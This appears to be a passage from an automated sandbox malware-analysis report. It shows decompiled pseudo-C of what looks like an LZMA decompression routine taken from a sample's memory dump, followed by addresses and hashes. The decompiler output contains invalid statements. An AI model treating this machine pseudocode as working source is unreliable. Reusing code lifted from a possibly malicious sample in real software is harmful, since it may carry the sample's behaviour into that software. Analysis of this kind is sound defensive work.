                          							_push(0x2d);
                          							asm("cdq");
                          							_pop(_t576);
                          							_push(9);
                          							_pop(_t577);
                          							_t622 = _t542 / _t576;
                          							_t544 = _t542 % _t576 & 0x000000ff;
                          							asm("cdq");
                          							_t617 = _t544 % _t577 & 0x000000ff;
                          							_v64 = _t617;
                          							_v32 = (1 << _t622) - 1;
                          							_v28 = (1 << _t544 / _t577) - 1;
                          							_t625 = (0x300 << _t617 + _t622) + 0x736;
                          							__eflags = 0x600 - _v124;
                          							if(0x600 == _v124) {
                          								L12:
                          								__eflags = _t625;
                          								if(_t625 == 0) {
                          									L14:
                          									_v76 = _v76 & 0x00000000;
                          									_v68 = _v68 & 0x00000000;
                          									goto L17;
                          								} else {
                          									goto L13;
                          								}
                          								do {
                          									L13:
                          									_t625 = _t625 - 1;
                          									__eflags = _t625;
                          									 *((short*)(_v8 + _t625 * 2)) = 0x400;
                          								} while (_t625 != 0);
                          								goto L14;
                          							}
                          							__eflags = _v8;
                          							if(_v8 != 0) {
                          								GlobalFree(_v8);
                          							}
                          							_t537 = GlobalAlloc(0x40, 0x600); // executed
                          							__eflags = _t537;
                          							_v8 = _t537;
                          							if(_t537 == 0) {
                          								goto L174;
                          							} else {
                          								_v124 = 0x600;
                          								goto L12;
                          							}
                          						case 1:
                          							L15:
                          							__eflags = _v112;
                          							if(_v112 == 0) {
                          								_v140 = 1;
                          								goto L173;
                          							}
                          							_v112 = _v112 - 1;
                          							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
                          							_v116 = _v116 + 1;
                          							_t50 =  &_v76;
                          							 *_t50 = _v76 + 1;
                          							__eflags =  *_t50;
                          							L17:
                          							__eflags = _v76 - 4;
                          							if(_v76 < 4) {
                          								goto L15;
                          							}
                          							_t550 = _v68;
                          							__eflags = _t550 - _v120;
                          							if(_t550 == _v120) {
                          								L22:
                          								_v76 = 5;
                          								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
                          								goto L25;
                          							}
                          							__eflags = _v12;
                          							_v120 = _t550;
                          							if(_v12 != 0) {
                          								GlobalFree(_v12);
                          							}
                          							_t537 = GlobalAlloc(0x40, _v68); // executed
                          							__eflags = _t537;
                          							_v12 = _t537;
                          							if(_t537 == 0) {
                          								goto L174;
                          							} else {
                          								goto L22;
                          							}
                          						case 2:
                          							L26:
                          							_t557 = _v100 & _v32;
                          							_v136 = 6;
                          							_v80 = _t557;
                          							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
                          							goto L135;
                          						case 3:
                          							L23:
                          							__eflags = _v112;
                          							if(_v112 == 0) {
                          								_v140 = 3;
                          								goto L173;
                          							}
                          							_v112 = _v112 - 1;
                          							_t72 =  &_v116;
                          							 *_t72 = _v116 + 1;
                          							__eflags =  *_t72;
                          							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                          							L25:
                          							_v76 = _v76 - 1;
                          							__eflags = _v76;
                          							if(_v76 != 0) {
                          								goto L23;
                          							}
                          							goto L26;
                          						case 4:
                          							L136:
                          							_t559 =  *_t626;
                          							_t610 = _t559 & 0x0000ffff;
                          							_t591 = (_v20 >> 0xb) * _t610;
                          							__eflags = _v16 - _t591;
                          							if(_v16 >= _t591) {
                          								_v20 = _v20 - _t591;
                          								_v16 = _v16 - _t591;
                          								_v68 = 1;
                          								_t560 = _t559 - (_t559 >> 5);
                          								__eflags = _t560;
                          								 *_t626 = _t560;
                          							} else {
                          								_v20 = _t591;
                          								_v68 = _v68 & 0x00000000;
                          								 *_t626 = (0x800 - _t610 >> 5) + _t559;
                          							}
                          							__eflags = _v20 - 0x1000000;
                          							if(_v20 >= 0x1000000) {
                          								goto L142;
                          							} else {
                          								goto L140;
                          							}
                          						case 5:
                          							L140:
                          							__eflags = _v112;
                          							if(_v112 == 0) {
                          								_v140 = 5;
                          								goto L173;
                          							}
                          							_v20 = _v20 << 8;
                          							_v112 = _v112 - 1;
                          							_t464 =  &_v116;
                          							 *_t464 = _v116 + 1;
                          							__eflags =  *_t464;
                          							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                          							L142:
                          							_t561 = _v136;
                          							goto L143;
                          						case 6:
                          							__edx = 0;
                          							__eflags = _v68;
                          							if(_v68 != 0) {
                          								__eax = _v8;
                          								__ecx = _v60;
                          								_v56 = 1;
                          								_v136 = 7;
                          								__esi = _v8 + 0x180 + _v60 * 2;
                          								goto L135;
                          							}
                          							__eax = _v96 & 0x000000ff;
                          							__esi = _v100;
                          							__cl = 8;
                          							__cl = 8 - _v64;
                          							__esi = _v100 & _v28;
                          							__eax = (_v96 & 0x000000ff) >> 8;
                          							__ecx = _v64;
                          							__esi = (_v100 & _v28) << 8;
                          							__ecx = _v8;
                          							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
                          							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
                          							__eflags = _v60 - 4;
                          							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                          							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                          							if(_v60 >= 4) {
                          								__eflags = _v60 - 0xa;
                          								if(_v60 >= 0xa) {
                          									_t103 =  &_v60;
                          									 *_t103 = _v60 - 6;
                          									__eflags =  *_t103;
                          								} else {
                          									_v60 = _v60 - 3;
                          								}
                          							} else {
                          								_v60 = 0;
                          							}
                          							__eflags = _v56 - __edx;
                          							if(_v56 == __edx) {
                          								__ebx = 0;
                          								__ebx = 1;
                          								goto L63;
                          							}
                          							__eax = _v24;
                          							__eax = _v24 - _v48;
                          							__eflags = __eax - _v120;
                          							if(__eax >= _v120) {
                          								__eax = __eax + _v120;
                          								__eflags = __eax;
                          							}
                          							__ecx = _v12;
                          							__ebx = 0;
                          							__ebx = 1;
                          							__al =  *((intOrPtr*)(__eax + __ecx));
                          							_v95 =  *((intOrPtr*)(__eax + __ecx));
                          							goto L43;
                          						case 7:
                          							__eflags = _v68 - 1;
                          							if(_v68 != 1) {
                          								__eax = _v40;
                          								_v132 = 0x16;
                          								_v36 = _v40;
                          								__eax = _v44;
                          								_v40 = _v44;
                          								__eax = _v48;
                          								_v44 = _v48;
                          								__eax = 0;
                          								__eflags = _v60 - 7;
                          								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                          								__al = __al & 0x000000fd;
                          								__eax = (__eflags >= 0) - 1 + 0xa;
                          								_v60 = (__eflags >= 0) - 1 + 0xa;
                          								__eax = _v8;
                          								__eax = _v8 + 0x664;
                          								__eflags = __eax;
                          								_v92 = __eax;
                          								goto L71;
                          							}
                          							__eax = _v8;
                          							__ecx = _v60;
                          							_v136 = 8;
                          							__esi = _v8 + 0x198 + _v60 * 2;
                          							goto L135;
                          						case 8:
                          							__eflags = _v68;
                          							if(_v68 != 0) {
                          								__eax = _v8;
                          								__ecx = _v60;
                          								_v136 = 0xa;
                          								__esi = _v8 + 0x1b0 + _v60 * 2;
                          							} else {
                          								__eax = _v60;
                          								__ecx = _v8;
                          								__eax = _v60 + 0xf;
                          								_v136 = 9;
                          								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
                          								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
                          							}
                          							goto L135;
                          						case 9:
                          							__eflags = _v68;
                          							if(_v68 != 0) {
                          								goto L92;
                          							}
                          							__eflags = _v100;
                          							if(_v100 == 0) {
                          								goto L174;
                          							}
                          							__eax = 0;
                          							__eflags = _v60 - 7;
                          							_t264 = _v60 - 7 >= 0;
                          							__eflags = _t264;
                          							0 | _t264 = _t264 + _t264 + 9;
                          							_v60 = _t264 + _t264 + 9;
                          							goto L78;
                          						case 0xa:
                          							__eflags = _v68;
                          							if(_v68 != 0) {
                          								__eax = _v8;
                          								__ecx = _v60;
                          								_v136 = 0xb;
                          								__esi = _v8 + 0x1c8 + _v60 * 2;
                          								goto L135;
                          							}
                          							__eax = _v44;
                          							goto L91;
                          						case 0xb:
                          							__eflags = _v68;
                          							if(_v68 != 0) {
                          								__ecx = _v40;
                          								__eax = _v36;
                          								_v36 = _v40;
                          							} else {
                          								__eax = _v40;
                          							}
                          							__ecx = _v44;
                          							_v40 = _v44;
                          							L91:
                          							__ecx = _v48;
                          							_v48 = __eax;
                          							_v44 = _v48;
                          							L92:
                          							__eax = _v8;
                          							_v132 = 0x15;
                          							__eax = _v8 + 0xa68;
                          							_v92 = _v8 + 0xa68;
                          							goto L71;
                          						case 0xc:
                          							L102:
                          							__eflags = _v112;
                          							if(_v112 == 0) {
                          								_v140 = 0xc;
                          								goto L173;
                          							}
                          							__ecx = _v116;
                          							__eax = _v16;
                          							_v20 = _v20 << 8;
                          							__ecx =  *_v116 & 0x000000ff;
                          							_v112 = _v112 - 1;
                          							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                          							_t340 =  &_v116;
                          							 *_t340 = _v116 + 1;
                          							__eflags =  *_t340;
                          							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                          							__eax = _v48;
                          							goto L104;
                          						case 0xd:
                          							L39:
                          							__eflags = _v112;
                          							if(_v112 == 0) {
                          								_v140 = 0xd;
                          								goto L173;
                          							}
                          							__ecx = _v116;
                          							__eax = _v16;
                          							_v20 = _v20 << 8;
                          							__ecx =  *_v116 & 0x000000ff;
                          							_v112 = _v112 - 1;
                          							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                          							_t127 =  &_v116;
                          							 *_t127 = _v116 + 1;
                          							__eflags =  *_t127;
                          							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                          							L41:
                          							__eax = _v68;
                          							__eflags = _v76 - _v68;
                          							if(_v76 != _v68) {
                          								goto L50;
                          							}
                          							__eflags = __ebx - 0x100;
                          							if(__ebx >= 0x100) {
                          								goto L56;
                          							}
                          							L43:
                          							__eax = _v95 & 0x000000ff;
                          							_v95 = _v95 << 1;
                          							__ecx = _v92;
                          							__eax = (_v95 & 0x000000ff) >> 7;
                          							_v76 = __eax;
                          							__eax = __eax + 1;
                          							__eax = __eax << 8;
                          							__eax = __eax + __ebx;
                          							__esi = _v92 + __eax * 2;
                          							_v20 = _v20 >> 0xb;
                          							__ax =  *__esi;
                          							_v88 = __esi;
                          							__edx = __ax & 0x0000ffff;
                          							__ecx = (_v20 >> 0xb) * __edx;
                          							__eflags = _v16 - __ecx;
                          							if(_v16 >= __ecx) {
                          								_v20 = _v20 - __ecx;
                          								_v16 = _v16 - __ecx;
                          								__cx = __ax;
                          								_v68 = 1;
                          								__cx = __ax >> 5;
                          								__eflags = __eax;
                          								__ebx = __ebx + __ebx + 1;
                          								 *__esi = __ax;
                          							} else {
                          								_v68 = _v68 & 0x00000000;
                          								_v20 = __ecx;
                          								0x800 = 0x800 - __edx;
                          								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                          								__ebx = __ebx + __ebx;
                          								 *__esi = __cx;
                          							}
                          							__eflags = _v20 - 0x1000000;
                          							_v72 = __ebx;
                          							if(_v20 >= 0x1000000) {
                          								goto L41;
                          							} else {
                          								goto L39;
                          							}
                          						case 0xe:
                          							L48:
                          							__eflags = _v112;
                          							if(_v112 == 0) {
                          								_v140 = 0xe;
                          								goto L173;
                          							}
                          							__ecx = _v116;
                          							__eax = _v16;
                          							_v20 = _v20 << 8;
                          							__ecx =  *_v116 & 0x000000ff;
                          							_v112 = _v112 - 1;
                          							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                          							_t161 =  &_v116;
                          							 *_t161 = _v116 + 1;
                          							__eflags =  *_t161;
                          							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                          							while(1) {
                          								L50:
                          								__eflags = __ebx - 0x100;
                          								if(__ebx >= 0x100) {
                          									break;
                          								}
                          								__eax = _v92;
                          								__edx = __ebx + __ebx;
                          								__ecx = _v20;
                          								__esi = __edx + __eax;
                          								__ecx = _v20 >> 0xb;
                          								__ax =  *__esi;
                          								_v88 = __esi;
                          								__edi = __ax & 0x0000ffff;
                          								__ecx = (_v20 >> 0xb) * __edi;
                          								__eflags = _v16 - __ecx;
                          								if(_v16 >= __ecx) {
                          									_v20 = _v20 - __ecx;
                          									_v16 = _v16 - __ecx;
                          									__cx = __ax;
                          									_t175 = __edx + 1; // 0x1
                          									__ebx = _t175;
                          									__cx = __ax >> 5;
                          									__eflags = __eax;
                          									 *__esi = __ax;
                          								} else {
                          									_v20 = __ecx;
                          									0x800 = 0x800 - __edi;
                          									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          									__ebx = __ebx + __ebx;
                          									 *__esi = __cx;
                          								}
                          								__eflags = _v20 - 0x1000000;
                          								_v72 = __ebx;
                          								if(_v20 >= 0x1000000) {
                          									continue;
                          								} else {
                          									goto L48;
                          								}
                          							}
                          							L56:
                          							_t178 =  &_v56;
                          							 *_t178 = _v56 & 0x00000000;
                          							__eflags =  *_t178;
                          							goto L57;
                          						case 0xf:
                          							L60:
                          							__eflags = _v112;
                          							if(_v112 == 0) {
                          								_v140 = 0xf;
                          								goto L173;
                          							}
                          							__ecx = _v116;
                          							__eax = _v16;
                          							_v20 = _v20 << 8;
                          							__ecx =  *_v116 & 0x000000ff;
                          							_v112 = _v112 - 1;
                          							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                          							_t208 =  &_v116;
                          							 *_t208 = _v116 + 1;
                          							__eflags =  *_t208;
                          							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                          							L62:
                          							__eflags = __ebx - 0x100;
                          							if(__ebx >= 0x100) {
                          								L57:
                          								__al = _v72;
                          								_v96 = _v72;
                          								goto L58;
                          							}
                          							L63:
                          							__eax = _v92;
                          							__edx = __ebx + __ebx;
                          							__ecx = _v20;
                          							__esi = __edx + __eax;
                          							__ecx = _v20 >> 0xb;
                          							__ax =  *__esi;
                          							_v88 = __esi;
                          							__edi = __ax & 0x0000ffff;
                          							__ecx = (_v20 >> 0xb) * __edi;
                          							__eflags = _v16 - __ecx;
                          							if(_v16 >= __ecx) {
                          								_v20 = _v20 - __ecx;
                          								_v16 = _v16 - __ecx;
                          								__cx = __ax;
                          								_t222 = __edx + 1; // 0x1
                          								__ebx = _t222;
                          								__cx = __ax >> 5;
                          								__eflags = __eax;
                          								 *__esi = __ax;
                          							} else {
                          								_v20 = __ecx;
                          								0x800 = 0x800 - __edi;
                          								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          								__ebx = __ebx + __ebx;
                          								 *__esi = __cx;
                          							}
                          							__eflags = _v20 - 0x1000000;
                          							_v72 = __ebx;
                          							if(_v20 >= 0x1000000) {
                          								goto L62;
                          							} else {
                          								goto L60;
                          							}
                          						case 0x10:
                          							L112:
                          							__eflags = _v112;
                          							if(_v112 == 0) {
                          								_v140 = 0x10;
                          								goto L173;
                          							}
                          							__ecx = _v116;
                          							__eax = _v16;
                          							_v20 = _v20 << 8;
                          							__ecx =  *_v116 & 0x000000ff;
                          							_v112 = _v112 - 1;
                          							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                          							_t371 =  &_v116;
                          							 *_t371 = _v116 + 1;
                          							__eflags =  *_t371;
                          							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                          							goto L114;
                          						case 0x11:
                          							L71:
                          							__esi = _v92;
                          							_v136 = 0x12;
                          							goto L135;
                          						case 0x12:
                          							__eflags = _v68;
                          							if(_v68 != 0) {
                          								__eax = _v92;
                          								_v136 = 0x13;
                          								__esi = _v92 + 2;
                          								L135:
                          								_v88 = _t626;
                          								goto L136;
                          							}
                          							__eax = _v80;
                          							_v52 = _v52 & 0x00000000;
                          							__ecx = _v92;
                          							__eax = _v80 << 4;
                          							__eflags = __eax;
                          							__eax = _v92 + __eax + 4;
                          							goto L133;
                          						case 0x13:
                          							__eflags = _v68;
                          							if(_v68 != 0) {
                          								_t475 =  &_v92;
                          								 *_t475 = _v92 + 0x204;
                          								__eflags =  *_t475;
                          								_v52 = 0x10;
                          								_v68 = 8;
                          								L147:
                          								_v128 = 0x14;
                          								goto L148;
                          							}
                          							__eax = _v80;
                          							__ecx = _v92;
                          							__eax = _v80 << 4;
                          							_v52 = 8;
                          							__eax = _v92 + (_v80 << 4) + 0x104;
                          							L133:
                          							_v92 = __eax;
                          							_v68 = 3;
                          							goto L147;
                          						case 0x14:
                          							_v52 = _v52 + __ebx;
                          							__eax = _v132;
                          							goto L143;
                          						case 0x15:
                          							__eax = 0;
                          							__eflags = _v60 - 7;
                          							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                          							__al = __al & 0x000000fd;
                          							__eax = (__eflags >= 0) - 1 + 0xb;
                          							_v60 = (__eflags >= 0) - 1 + 0xb;
                          							goto L123;
                          						case 0x16:
                          							__eax = _v52;
                          							__eflags = __eax - 4;
                          							if(__eax >= 4) {
                          								_push(3);
                          								_pop(__eax);
                          							}
                          							__ecx = _v8;
                          							_v68 = 6;
                          							__eax = __eax << 7;
                          							_v128 = 0x19;
                          							_v92 = __eax;
                          							goto L148;
                          						case 0x17:
                          							L148:
                          							__eax = _v68;
                          							_v84 = 1;
                          							_v76 = _v68;
                          							goto L152;
                          						case 0x18:
                          							L149:
                          							__eflags = _v112;
                          							if(_v112 == 0) {
                          								_v140 = 0x18;
                          								goto L173;
                          							}
                          							__ecx = _v116;
                          							__eax = _v16;
                          							_v20 = _v20 << 8;
                          							__ecx =  *_v116 & 0x000000ff;
                          							_v112 = _v112 - 1;
                          							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                          							_t490 =  &_v116;
                          							 *_t490 = _v116 + 1;
                          							__eflags =  *_t490;
                          							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                          							L151:
                          							_t493 =  &_v76;
                          							 *_t493 = _v76 - 1;
                          							__eflags =  *_t493;
                          							L152:
                          							__eflags = _v76;
                          							if(_v76 <= 0) {
                          								__ecx = _v68;
                          								__ebx = _v84;
                          								0 = 1;
                          								__eax = 1 << __cl;
                          								__ebx = _v84 - (1 << __cl);
                          								__eax = _v128;
                          								_v72 = __ebx;
                          								L143:
                          								_v140 = _t561;
                          								goto L3;
                          							}
                          							__eax = _v84;
                          							_v20 = _v20 >> 0xb;
                          							__edx = _v84 + _v84;
                          							__eax = _v92;
                          							__esi = __edx + __eax;
                          							_v88 = __esi;
                          							__ax =  *__esi;
                          							__edi = __ax & 0x0000ffff;
                          							__ecx = (_v20 >> 0xb) * __edi;
                          							__eflags = _v16 - __ecx;
                          							if(_v16 >= __ecx) {
                          								_v20 = _v20 - __ecx;
                          								_v16 = _v16 - __ecx;
                          								__cx = __ax;
                          								__cx = __ax >> 5;
                          								__eax = __eax - __ecx;
                          								__edx = __edx + 1;
                          								__eflags = __edx;
                          								 *__esi = __ax;
                          								_v84 = __edx;
                          							} else {
                          								_v20 = __ecx;
                          								0x800 = 0x800 - __edi;
                          								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          								_v84 = _v84 << 1;
                          								 *__esi = __cx;
                          							}
                          							__eflags = _v20 - 0x1000000;
                          							if(_v20 >= 0x1000000) {
                          								goto L151;
                          							} else {
                          								goto L149;
                          							}
                          						case 0x19:
                          							__eflags = __ebx - 4;
                          							if(__ebx < 4) {
                          								_v48 = __ebx;
                          								L122:
                          								_t399 =  &_v48;
                          								 *_t399 = _v48 + 1;
                          								__eflags =  *_t399;
                          								L123:
                          								__eax = _v48;
                          								__eflags = __eax;
                          								if(__eax == 0) {
                          									_v52 = _v52 | 0xffffffff;
                          									goto L173;
                          								}
                          								__eflags = __eax - _v100;
                          								if(__eax > _v100) {
                          									goto L174;
                          								}
                          								_v52 = _v52 + 2;
                          								__eax = _v52;
                          								_t406 =  &_v100;
                          								 *_t406 = _v100 + _v52;
                          								__eflags =  *_t406;
                          								goto L126;
                          							}
                          							__ecx = __ebx;
                          							__eax = __ebx;
                          							__ecx = __ebx >> 1;
                          							__eax = __ebx & 0x00000001;
                          							__ecx = (__ebx >> 1) - 1;
                          							__al = __al | 0x00000002;
                          							__eax = (__ebx & 0x00000001) << __cl;
                          							__eflags = __ebx - 0xe;
                          							_v48 = __eax;
                          							if(__ebx >= 0xe) {
                          								__ebx = 0;
                          								_v76 = __ecx;
                          								L105:
                          								__eflags = _v76;
                          								if(_v76 <= 0) {
                          									__eax = __eax + __ebx;
                          									_v68 = 4;
                          									_v48 = __eax;
                          									__eax = _v8;
                          									__eax = _v8 + 0x644;
                          									__eflags = __eax;
                          									L111:
                          									__ebx = 0;
                          									_v92 = __eax;
                          									_v84 = 1;
                          									_v72 = 0;
                          									_v76 = 0;
                          									L115:
                          									__eax = _v68;
                          									__eflags = _v76 - _v68;
                          									if(_v76 >= _v68) {
                          										_t397 =  &_v48;
                          										 *_t397 = _v48 + __ebx;
                          										__eflags =  *_t397;
                          										goto L122;
                          									}
                          									__eax = _v84;
                          									_v20 = _v20 >> 0xb;
                          									__edi = _v84 + _v84;
                          									__eax = _v92;
                          									__esi = __edi + __eax;
                          									_v88 = __esi;
                          									__ax =  *__esi;
                          									__ecx = __ax & 0x0000ffff;
                          									__edx = (_v20 >> 0xb) * __ecx;
                          									__eflags = _v16 - __edx;
                          									if(_v16 >= __edx) {
                          										__ecx = 0;
                          										_v20 = _v20 - __edx;
                          										__ecx = 1;
                          										_v16 = _v16 - __edx;
                          										__ebx = 1;
                          										__ecx = _v76;
                          										__ebx = 1 << __cl;
                          										__ecx = 1 << __cl;
                          										__ebx = _v72;
                          										__ebx = _v72 | __ecx;
                          										__cx = __ax;
                          										__cx = __ax >> 5;
                          										__eax = __eax - __ecx;
                          										__edi = __edi + 1;
                          										__eflags = __edi;
                          										_v72 = __ebx;
                          										 *__esi = __ax;
                          										_v84 = __edi;
                          									} else {
                          										_v20 = __edx;
                          										0x800 = 0x800 - __ecx;
                          										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                          										_v84 = _v84 << 1;
                          										 *__esi = __dx;
                          									}
                          									__eflags = _v20 - 0x1000000;
                          									if(_v20 >= 0x1000000) {
                          										L114:
                          										_t374 =  &_v76;
                          										 *_t374 = _v76 + 1;
                          										__eflags =  *_t374;
                          										goto L115;
                          									} else {
                          										goto L112;
                          									}
                          								}
                          								__ecx = _v16;
                          								__ebx = __ebx + __ebx;
                          								_v20 = _v20 >> 1;
                          								__eflags = _v16 - _v20;
                          								_v72 = __ebx;
                          								if(_v16 >= _v20) {
                          									__ecx = _v20;
                          									_v16 = _v16 - _v20;
                          									__ebx = __ebx | 0x00000001;
                          									__eflags = __ebx;
                          									_v72 = __ebx;
                          								}
                          								__eflags = _v20 - 0x1000000;
                          								if(_v20 >= 0x1000000) {
                          									L104:
                          									_t344 =  &_v76;
                          									 *_t344 = _v76 - 1;
                          									__eflags =  *_t344;
                          									goto L105;
                          								} else {
                          									goto L102;
                          								}
                          							}
                          							__edx = _v8;
                          							__eax = __eax - __ebx;
                          							_v68 = __ecx;
                          							__eax = _v8 + 0x55e + __eax * 2;
                          							goto L111;
                          						case 0x1a:
                          							L58:
                          							__eflags = _v104;
                          							if(_v104 == 0) {
                          								_v140 = 0x1a;
                          								goto L173;
                          							}
                          							__ecx = _v108;
                          							__al = _v96;
                          							__edx = _v12;
                          							_v100 = _v100 + 1;
                          							_v108 = _v108 + 1;
                          							_v104 = _v104 - 1;
                          							 *_v108 = __al;
                          							__ecx = _v24;
                          							 *(_v12 + __ecx) = __al;
                          							__eax = __ecx + 1;
                          							__edx = 0;
                          							_t197 = __eax % _v120;
                          							__eax = __eax / _v120;
                          							__edx = _t197;
                          							goto L82;
                          						case 0x1b:
                          							L78:
                          							__eflags = _v104;
                          							if(_v104 == 0) {
                          								_v140 = 0x1b;
                          								goto L173;
                          							}
                          							__eax = _v24;
                          							__eax = _v24 - _v48;
                          							__eflags = __eax - _v120;
                          							if(__eax >= _v120) {
                          								__eax = __eax + _v120;
                          								__eflags = __eax;
                          							}
                          							__edx = _v12;
                          							__cl =  *(__edx + __eax);
                          							__eax = _v24;
                          							_v96 = __cl;
                          							 *(__edx + __eax) = __cl;
                          							__eax = __eax + 1;
                          							__edx = 0;
                          							_t280 = __eax % _v120;
                          							__eax = __eax / _v120;
                          							__edx = _t280;
                          							__eax = _v108;
                          							_v100 = _v100 + 1;
                          							_v108 = _v108 + 1;
                          							_t289 =  &_v104;
                          							 *_t289 = _v104 - 1;
                          							__eflags =  *_t289;
                          							 *_v108 = __cl;
                          							L82:
                          							_v24 = __edx;
                          							goto L83;
                          						case 0x1c:
                          							while(1) {
                          								L126:
                          								__eflags = _v104;
                          								if(_v104 == 0) {
                          									break;
                          								}
                          								__eax = _v24;
                          								__eax = _v24 - _v48;
                          								__eflags = __eax - _v120;
                          								if(__eax >= _v120) {
                          									__eax = __eax + _v120;
                          									__eflags = __eax;
                          								}
                          								__edx = _v12;
                          								__cl =  *(__edx + __eax);
                          								__eax = _v24;
                          								_v96 = __cl;
                          								 *(__edx + __eax) = __cl;
                          								__eax = __eax + 1;
                          								__edx = 0;
                          								_t420 = __eax % _v120;
                          								__eax = __eax / _v120;
                          								__edx = _t420;
                          								__eax = _v108;
                          								_v108 = _v108 + 1;
                          								_v104 = _v104 - 1;
                          								_v52 = _v52 - 1;
                          								__eflags = _v52;
                          								 *_v108 = __cl;
                          								_v24 = _t420;
                          								if(_v52 > 0) {
                          									continue;
                          								} else {
                          									L83:
                          									_v140 = 2;
                          									goto L3;
                          								}
                          							}
                          							_v140 = 0x1c;
                          							L173:
                          							_push(0x22);
                          							_pop(_t574);
                          							memcpy(_v148,  &_v140, _t574 << 2);
                          							return 0;
                          					}
                          				}
                          				L174:
                          				_t538 = _t537 | 0xffffffff;
                          				return _t538;
                          			}










































                          0x0040623b
                          0x0040623e
                          0x00406241
                          0x00406244
                          0x00406247
                          0x0040624a
                          0x0040624d
                          0x0040624f
                          0x00406252
                          0x00406255
                          0x00406258
                          0x0040625a
                          0x0040625a
                          0x0040625a
                          0x00000000
                          0x00000000
                          0x004063bc
                          0x004063bc
                          0x004063c0
                          0x00406886
                          0x00000000
                          0x00406886
                          0x004063c6
                          0x004063c9
                          0x004063cc
                          0x004063cf
                          0x004063d1
                          0x004063d1
                          0x004063d1
                          0x004063d4
                          0x004063d7
                          0x004063da
                          0x004063dd
                          0x004063e0
                          0x004063e3
                          0x004063e4
                          0x004063e6
                          0x004063e6
                          0x004063e6
                          0x004063e9
                          0x004063ec
                          0x004063ef
                          0x004063f2
                          0x004063f2
                          0x004063f2
                          0x004063f5
                          0x004063f7
                          0x004063f7
                          0x00000000
                          0x00000000
                          0x00406639
                          0x00406639
                          0x00406639
                          0x0040663d
                          0x00000000
                          0x00000000
                          0x00406643
                          0x00406646
                          0x00406649
                          0x0040664c
                          0x0040664e
                          0x0040664e
                          0x0040664e
                          0x00406651
                          0x00406654
                          0x00406657
                          0x0040665a
                          0x0040665d
                          0x00406660
                          0x00406661
                          0x00406663
                          0x00406663
                          0x00406663
                          0x00406666
                          0x00406669
                          0x0040666c
                          0x0040666f
                          0x00406672
                          0x00406676
                          0x00406678
                          0x0040667b
                          0x00000000
                          0x0040667d
                          0x004063fa
                          0x004063fa
                          0x00000000
                          0x004063fa
                          0x0040667b
                          0x004068b0
                          0x004068d2
                          0x004068d8
                          0x004068da
                          0x004068e1
                          0x00000000
                          0x00000000
                          0x00405edf
                          0x004068e7
                          0x004068e7
                          0x00000000

                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a6e2085cebcdfb89d44d763a6c8341743f8cc52be166a66f13966f2f3d4d66a2
                          • Instruction ID: ba793bdfdeb6fca0581e378ecaac939fdd914989bdfd8c809e8e1c60c55c718d
                          • Opcode Fuzzy Hash: a6e2085cebcdfb89d44d763a6c8341743f8cc52be166a66f13966f2f3d4d66a2
                          • Instruction Fuzzy Hash: 90816972D04229DBDF24DFA8C844BAEBBB0FB44305F11816AD856B72C0C7785A86DF54
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 98%
                          			E004062EB() {
                          				signed int _t539;
                          				unsigned short _t540;
                          				signed int _t541;
                          				void _t542;
                          				signed int _t543;
                          				signed int _t544;
                          				signed int _t573;
